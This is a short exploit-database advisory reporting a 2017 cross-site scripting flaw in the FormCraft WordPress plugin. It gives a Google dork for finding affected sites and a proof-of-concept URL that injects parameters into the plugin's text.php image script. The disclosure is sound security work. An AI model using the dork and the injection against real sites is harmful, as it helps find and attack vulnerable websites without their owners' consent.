WordPress Plugins FormCraft - Cross-Site Scripting Image type

2017.12.17
id AlHikam0x (ID) id
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/plugins/formcraft/

# Exploit Title: WordPress Plugins FormCraft - Cross-Site Scripting Image Type # Google Dork: inurl:/wp-content/plugins/formcraft/ # Date: 15 December 2017 (Indonesia) # Exploit Author: AlHikam0x # Tested on: Ubuntu Proof of Concept Check blank page : https://web-target/wp-content/plugins/formcraft/php/text.php Exploit XSS : ?text=XSS Vulnerability&bg=white&text_color=black View image : https://4.bp.blogspot.com/-M9VdTj2mmxc/WjLiiuB38xI/AAAAAAAAAAg/EiW2PsE7okkfM9RmVJAoehcQ789w8inZwCLcBGAs/s1600/Screenshot%2Bfrom%2B2017-12-15%2B03-43-22.png Finish : https://web-target/wp-content/plugins/formcraft/php/text.php?text=qh3xu&bg=white&text_color=black

References:

http://alhikam0x.blogspot.co.id/2017/12/wordpress-plugins-formcraft-xss-image.html


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top